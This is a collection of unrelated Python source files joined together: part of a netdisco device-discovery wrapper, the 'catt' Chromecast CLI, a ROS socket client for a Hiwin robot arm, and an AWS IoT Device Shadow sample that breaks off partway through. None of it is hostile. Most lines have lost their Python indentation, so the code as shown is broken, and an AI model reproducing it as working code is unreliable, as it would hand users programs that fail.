netdis = NetworkDiscovery()
netdis.scan()
for device_type in netdis.discover():
device_info = netdis.get_info(device_type)[0]
device_ip = device_info['host']
device_info['device_type'] = device_type
# Find MAC based on IP
try:
with self._host_state.lock:
device_mac = self._host_state.ip_mac_dict[device_ip]
except KeyError:
continue
# Get device_id based on MAC
device_id = utils.get_device_id(device_mac, self._host_state)
            # Submit for upload later
with self._host_state.lock:
self._host_state.pending_netdisco_dict \
.setdefault(device_id, []).append(device_info)
def test():
n = NetdiscoWrapper(None)
n._download_netdisco_binary()
if __name__ == '__main__':
test()
|
cli.py
|
# -*- coding: utf-8 -*-
import configparser
import random
import sys
import time
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import click
from . import __version__
from .controllers import Cache
from .controllers import CastState
from .controllers import get_chromecasts
from .controllers import setup_cast
from .controllers import StateFileError
from .controllers import StateMode
from .error import CastError
from .error import CattUserError
from .error import CliError
from .http_server import serve_file
from .subs_info import SubsInfo
from .util import echo_json
from .util import echo_status
from .util import echo_warning
from .util import hunt_subtitles
from .util import is_ipaddress
CONFIG_DIR = Path(click.get_app_dir("catt"))
CONFIG_PATH = Path(CONFIG_DIR, "catt.cfg")
STATE_PATH = Path(CONFIG_DIR, "state.json")
class CattTimeParamType(click.ParamType):
def convert(self, value, param, ctx):
try:
tdesc = [int(x) for x in value.split(":")]
tlen = len(tdesc)
if (tlen > 1 and any(t > 59 for t in tdesc)) or tlen > 3:
raise ValueError
except ValueError:
self.fail("{} is not a valid time description.".format(value))
tdesc.reverse()
return sum(tdesc[p] * 60 ** p for p in range(tlen))
CATT_TIME = CattTimeParamType()
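# Worked examples for the conversion above (illustrative, not used by the CLI):
#   CATT_TIME.convert("90", None, None)      -> 90
#   CATT_TIME.convert("1:30", None, None)    -> 90      (1*60 + 30)
#   CATT_TIME.convert("1:00:05", None, None) -> 3605    (1*3600 + 0*60 + 5)
# The reversed list means position p is weighted by 60**p (seconds, minutes, hours).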
class YtdlOptParamType(click.ParamType):
def convert(self, value, param, ctx):
if "=" not in value:
self.fail("{} is not a valid key/value pair.".format(value))
ykey, yval = value.split("=", 1)
yval = {"true": True, "false": False}.get(yval.lower().strip(), yval)
return (ykey, yval)
YTDL_OPT = YtdlOptParamType()
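# Worked examples (illustrative): "-y format=bestaudio" yields ("format", "bestaudio"),
# and "-y quiet=true" yields ("quiet", True), since "true"/"false" are coerced to booleans.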
def process_url(ctx, param, value):
if value == "-":
stdin_text = click.get_text_stream("stdin")
if not stdin_text.isatty():
value = stdin_text.read().strip()
else:
raise CliError("No input received from stdin")
if "://" not in value:
if ctx.info_name != "cast":
raise CliError("Local file not allowed as argument to this command")
if not Path(value).is_file():
raise CliError("The chosen file does not exist")
return value
def process_path(ctx, param, value):
path = Path(value) if value else None
if path and (path.is_dir() or not path.parent.exists()):
raise CliError("The specified path is invalid")
return path
def process_subtitles(ctx, param, value):
if not value:
return None
pval = urlparse(value).path if "://" in value else value
if not pval.lower().endswith((".srt", ".vtt")):
raise CliError("Invalid subtitles format, only srt and vtt are supported")
if "://" not in value and not Path(value).is_file():
raise CliError("Subtitles file [{}] does not exist".format(value))
return value
def process_device(ctx, param, value):
"""
Resolve real device name when value is an alias.
:param value: Can be an ip-address or a name (alias or real name).
:type value: str
"""
if is_ipaddress(value):
return value
else:
return ctx.default_map["aliases"].get(value, value)
def fail_if_no_ip(ipaddr):
if not ipaddr:
raise CliError("Local IP-address could not be determined")
def create_server_thread(filename, address, port, content_type, single_req=False):
thr = Thread(target=serve_file, args=(filename, address, port, content_type, single_req))
    thr.daemon = True
thr.start()
return thr
CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
@click.group(context_settings=CONTEXT_SETTINGS)
@click.option("--delete-cache", is_flag=True, help="Empty the Chromecast discovery cache.")
@click.option("-d", "--device", metavar="NAME_OR_IP", callback=process_device, help="Select Chromecast device.")
@click.version_option(version=__version__, prog_name="catt", message="%(prog)s v%(version)s, Yearning Yachtman.")
@click.pass_context
def cli(ctx, delete_cache, device):
if delete_cache:
Cache().clear()
ctx.obj["device"] = device
@cli.command(short_help="Send a video to a Chromecast for playing.")
@click.argument("video_url", callback=process_url)
@click.option("-s", "--subtitles", callback=process_subtitles, metavar="SUB", help="Specify a subtitles file.")
@click.option(
"-f",
"--force-default",
is_flag=True,
help="Force use of the default Chromecast app (use if a custom app doesn't work).",
)
@click.option("-r", "--random-play", is_flag=True, help="Play random item from playlist, if applicable.")
@click.option(
"--no-subs", is_flag=True, default=False, help="Don't try to load subtitles automatically from the local folder."
)
@click.option("-n", "--no-playlist", is_flag=True, help="Play only video, if url contains both video and playlist ids.")
@click.option(
"-y",
"--ytdl-option",
type=YTDL_OPT,
multiple=True,
metavar="OPT",
help="YouTube-DL option. "
"Should be passed as `-y option=value`, and can be specified multiple times (implies --force-default).",
)
@click.option(
"-b",
"--block",
is_flag=True,
help="Keep catt process alive until playback has ended. "
"Only useful when casting remote files, as catt is already running a server when casting local files. "
"Currently exits after playback of single media, so not useful with playlists yet.",
)
@click.pass_obj
def cast(settings, video_url, subtitles, force_default, random_play, no_subs, no_playlist, ytdl_option, block=False):
controller = "default" if force_default or ytdl_option else None
playlist_playback = False
st_thr = su_thr = subs = None
cst, stream = setup_cast(
settings["device"], video_url=video_url, prep="app", controller=controller, ytdl_options=ytdl_option
)
media_is_image = stream.guessed_content_category == "image"
local_or_remote = "local" if stream.is_local_file else "remote"
if stream.is_local_file:
fail_if_no_ip(stream.local_ip)
st_thr = create_server_thread(
video_url, stream.local_ip, stream.port, stream.guessed_content_type, single_req=media_is_image
)
elif stream.is_playlist and not (no_playlist and stream.video_id):
if stream.playlist_length == 0:
cst.kill(idle_only=True)
raise CliError("Playlist is empty")
if not random_play and cst.playlist_capability and stream.playlist_all_ids:
playlist_playback = True
else:
if random_play:
entry = random.randrange(0, stream.playlist_length)
else:
echo_warning("Playlist playback not possible, playing first video")
entry = 0
stream.set_playlist_entry(entry)
if playlist_playback:
click.echo("Casting remote playlist {}...".format(video_url))
video_id = stream.video_id or stream.playlist_all_ids[0]
cst.play_playlist(stream.playlist_id, video_id=video_id)
else:
if not subtitles and not no_subs and stream.is_local_file:
subtitles = hunt_subtitles(video_url)
if subtitles:
fail_if_no_ip(stream.local_ip)
subs = SubsInfo(subtitles, stream.local_ip, stream.port + 1)
su_thr = create_server_thread(
subs.file, subs.local_ip, subs.port, "text/vtt;charset=utf-8", single_req=True
)
click.echo("Casting {} file {}...".format(local_or_remote, video_url))
click.echo(
'{} "{}" on "{}"...'.format("Showing" if media_is_image else "Playing", stream.video_title, cst.cc_name)
)
if cst.info_type == "url":
cst.play_media_url(
stream.video_url,
title=stream.video_title,
content_type=stream.guessed_content_type,
subtitles=subs.url if subs else None,
thumb=stream.video_thumbnail,
)
elif cst.info_type == "id":
cst.play_media_id(stream.video_id)
else:
raise ValueError("Invalid or undefined info type")
if stream.is_local_file or subs:
click.echo("Serving local file(s).")
if not media_is_image and (stream.is_local_file or block):
if not cst.wait_for(["PLAYING"], timeout=10):
raise CliError("Playback of {} file has failed".format(local_or_remote))
cst.wait_for(["UNKNOWN", "IDLE"])
elif (stream.is_local_file and media_is_image) or subs:
while (st_thr and st_thr.is_alive()) or (su_thr and su_thr.is_alive()):
time.sleep(1)
@cli.command("cast_site", short_help="Cast any website to a Chromecast.")
@click.argument("url", callback=process_url)
@click.pass_obj
def cast_site(settings, url):
cst = setup_cast(settings["device"], controller="dashcast", action="load_url", prep="app")
click.echo('Casting {} on "{}"...'.format(url, cst.cc_name))
cst.load_url(url)
@cli.command(short_help="Add a video to the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.option("-n", "--play-next", is_flag=True, help="Add video immediately after currently playing video.")
@click.pass_obj
def add(settings, video_url, play_next):
cst, stream = setup_cast(settings["device"], video_url=video_url, action="add", prep="control")
if cst.name != stream.extractor or not (stream.is_remote_file or stream.is_playlist_with_active_entry):
raise CliError("This url cannot be added to the queue")
click.echo('Adding video id "{}" to the queue.'.format(stream.video_id))
if play_next:
cst.add_next(stream.video_id)
else:
cst.add(stream.video_id)
@cli.command(short_help="Remove a video from the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.pass_obj
def remove(settings, video_url):
cst, stream = setup_cast(settings["device"], video_url=video_url, action="remove", prep="control")
if cst.name != stream.extractor or not stream.is_remote_file:
raise CliError("This url cannot be removed from the queue")
click.echo('Removing video id "{}" from the queue.'.format(stream.video_id))
cst.remove(stream.video_id)
@cli.command(short_help="Clear the queue (YouTube only).")
@click.pass_obj
def clear(settings):
cst = setup_cast(settings["device"], action="clear", prep="control")
cst.clear()
@cli.command(short_help="Pause a video.")
@click.pass_obj
def pause(settings):
cst = setup_cast(settings["device"], action="pause", prep="control")
cst.pause()
@cli.command(short_help="Resume a video after it has been paused.")
@click.pass_obj
def play(settings):
cst = setup_cast(settings["device"], action="play", prep="control")
cst.play()
@cli.command("play_toggle", short_help="Toggle between playing and paused state.")
@click.pass_obj
def play_toggle(settings):
cst = setup_cast(settings["device"], action="play_toggle", prep="control")
cst.play_toggle()
@cli.command(short_help="Stop playing.")
@click.option(
"-f",
"--force",
is_flag=True,
help="Launch dummy chromecast app before sending stop command "
"(for devices that do not respond to stop command under certain circumstances).",
)
@click.pass_obj
def stop(settings, force):
cst = setup_cast(settings["device"])
cst.kill(force=force)
@cli.command(short_help="Rewind a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def rewind(settings, timedesc):
cst = setup_cast(settings["device"], action="rewind", prep="control")
cst.rewind(timedesc)
@cli.command(short_help="Fastforward a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def ffwd(settings, timedesc):
cst = setup_cast(settings["device"], action="ffwd", prep="control")
cst.ffwd(timedesc)
@cli.command(short_help="Seek the video to TIME position.")
@click.argument("timedesc", type=CATT_TIME, metavar="TIME")
@click.pass_obj
def seek(settings, timedesc):
cst = setup_cast(settings["device"], action="seek", prep="control")
cst.seek(timedesc)
@cli.command(short_help="Skip to end of content.")
@click.pass_obj
def skip(settings):
cst = setup_cast(settings["device"], action="skip", prep="control")
cst.skip()
@cli.command(short_help="Set the volume to LVL [0-100].")
@click.argument("level", type=click.IntRange(0, 100), metavar="LVL")
@click.pass_obj
def volume(settings, level):
cst = setup_cast(settings["device"])
cst.volume(level / 100.0)
@cli.command(short_help="Turn up volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumeup(settings, delta):
cst = setup_cast(settings["device"])
cst.volumeup(delta / 100.0)
@cli.command(short_help="Turn down volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumedown(settings, delta):
cst = setup_cast(settings["device"])
cst.volumedown(delta / 100.0)
@cli.command(short_help="Show some information about the currently-playing video.")
@click.pass_obj
def status(settings):
cst = setup_cast(settings["device"], prep="info")
echo_status(cst.cast_info)
@cli.command(short_help="Show complete information about the currently-playing video.")
@click.option("-j", "--json-output", is_flag=True, help="Output info as json.")
@click.pass_obj
def info(settings, json_output):
try:
cst = setup_cast(settings["device"], prep="info")
except CastError:
if json_output:
info = {}
else:
raise
else:
info = cst.info
if json_output:
echo_json(info)
else:
for (key, value) in info.items():
click.echo("{}: {}".format(key, value))
@cli.command(short_help="Scan the local network and show all Chromecasts and their IPs.")
@click.option("-j", "--json-output", is_flag=True, help="Output scan result as json.")
def scan(json_output):
if not json_output:
click.echo("Scanning Chromecasts...")
devices_dict = {
d.name: {
"host": d.host,
"port": d.port,
"manufacturer": d.device.manufacturer,
"model_name": d.model_name,
"uuid": d.uuid,
"cast_type": d.cast_type,
}
for d in get_chromecasts()
}
if json_output:
echo_json(devices_dict)
else:
if not devices_dict:
raise CastError("No devices found")
for device in devices_dict.keys():
click.echo("{host} - {device} - {manufacturer} {model_name}".format(device=device, **devices_dict[device]))
@cli.command(short_help="Save the current state of the Chromecast for later use.")
@click.argument("path", type=click.Path(writable=True), callback=process_path, required=False)
@click.pass_obj
def save(settings, path):
cst = setup_cast(settings["device"], prep="control")
if not cst.save_capability or cst.is_streaming_local_file:
raise CliError("Saving state of this kind of content is not supported")
elif cst.save_capability == "partial":
echo_warning("Please be advised that playlist data will not be saved")
echo_status(cst.media_info)
if path and path.is_file():
click.confirm("File already exists. Overwrite?", abort=True)
click.echo("Saving...")
if path:
state = CastState(path, StateMode.ARBI)
cc_name = "*"
else:
state = CastState(STATE_PATH, StateMode.CONF)
cc_name = cst.cc_name
state.set_data(cc_name, {"controller": cst.name, "data": cst.media_info})
@cli.command(short_help="Return Chromecast to saved state.")
@click.argument("path", type=click.Path(exists=True), callback=process_path, required=False)
@click.pass_obj
def restore(settings, path):
if not path and not STATE_PATH.is_file():
raise CliError("Save file in config dir has not been created")
cst = setup_cast(settings["device"])
state = CastState(path or STATE_PATH, StateMode.READ)
try:
data = state.get_data(cst.cc_name if not path else None)
except StateFileError:
raise CliError("The chosen file is not a valid save file")
if not data:
raise CliError("No save data found for this device")
echo_status(data["data"])
click.echo("Restoring...")
cst = setup_cast(settings["device"], prep="app", controller=data["controller"])
cst.restore(data["data"])
@cli.command("write_config", short_help='Please use "set_default".')
def write_config():
raise CliError('This command is now called "set_default"')
@cli.command("set_default", short_help="Set the selected device as default.")
@click.pass_obj
def set_default(settings):
config = readconfig()
device = get_device_from_settings(settings)
config["options"]["device"] = device
writeconfig(config)
@cli.command("del_default", short_help="Delete the default device.")
@click.pass_obj
def del_default(settings):
config = readconfig()
if "device" not in config["options"]:
raise CliError("No default device is set, so none deleted")
config["options"].pop("device")
writeconfig(config)
@cli.command("set_alias", short_help="Set an alias name for the selected device.")
@click.argument("name")
@click.pass_obj
def set_alias(settings, name):
config = readconfig()
device = get_device_from_settings(settings)
old_alias = get_alias_from_config(config, device)
if old_alias:
config["aliases"].pop(old_alias)
config["aliases"][name] = device
writeconfig(config)
@cli.command("del_alias", short_help="Delete the alias name of the selected device.")
@click.pass_obj
def del_alias(settings):
config = readconfig()
device = get_device_from_settings(settings)
alias = get_alias_from_config(config, device)
if not alias:
raise CliError('No alias exists for "{}", so none deleted'.format(device))
config["aliases"].pop(alias)
writeconfig(config)
def get_alias_from_config(config, device):
try:
return next(a for a, d in config["aliases"].items() if d == device)
except StopIteration:
return None
def get_device_from_settings(settings):
device = settings.get("device")
if device:
devices = get_chromecasts()
try:
if is_ipaddress(device):
next(d for d in devices if d.host == device)
else:
next(d for d in devices if d.name == device)
except StopIteration:
raise CliError('Specified device "{}" not found'.format(device))
else:
raise CliError("No device specified")
return device
def writeconfig(config):
try:
CONFIG_DIR.mkdir(parents=True)
except FileExistsError:
pass
with CONFIG_PATH.open("w") as configfile:
config.write(configfile)
def readconfig():
config = configparser.ConfigParser()
# ConfigParser.read does not take path-like objects <3.6.
config.read(str(CONFIG_PATH))
for req_section in ("options", "aliases"):
if req_section not in config.sections():
config.add_section(req_section)
return config
def get_default_map():
"""
Returns a dictionary of the form:
{"option": "value",
"aliases": {"device1": "device_name"}}
"""
config = readconfig()
conf_dict = {section: dict(config.items(section)) for section in config.sections()}
default_map = conf_dict["options"]
default_map["aliases"] = conf_dict["aliases"]
return default_map
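# Illustrative catt.cfg layout (values are assumptions), matching the sections
# that readconfig() guarantees and that set_default / set_alias write to:
#
#   [options]
#   device = Living Room TV
#
#   [aliases]
#   tv = Living Room TV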
def main():
try:
return cli(obj={}, default_map=get_default_map())
except CattUserError as err:
sys.exit("Error: {}.".format(str(err)))
if __name__ == "__main__":
main()
|
Hiwin_RT605_ArmCommand_Socket_20190627175041.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0'  # initial value of the transmitted data
Arm_feedback = 1  # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
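# Usage sketch for the switch emulation above (illustrative):
#
#   for case in switch(command):
#       if case(1):
#           handle_one()
#           break
#       if case():          # default: case() with no arguments matches anything
#           handle_default()
#           break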
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
#print("sssss:",socket_cmd.action)
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------ server side end -------
##---------- socket packet transmission ----------##
##--------------- socket: send arm commands -----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5  ## switch back to the initial mode state
        #print(data)
        Socket.send(data.encode('utf-8'))  # send the command string over the socket
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '48':  # F: arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # T: arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # 6: strategy finished
state_feedback.ArmState = 6
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':  # returns 0, false
state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # returns 1, true
state_feedback.SentFlag = 1
        ##--------------- socket: send arm commands end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  ## switch to the initial mode state
t = threading.Thread(target=thread_test)
    t.start()  # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
shadow.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
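# Illustrative shadow document shape (values are assumptions), showing the
# "desired" vs. "reported" split that the delta events described above reconcile:
#
#   {
#     "state": {
#       "desired":  { "color": "green" },
#       "reported": { "color": "red" }
#     }
#   }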
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
print("Finished getting initial shadow state.")
with locked_data.lock:
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
)
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
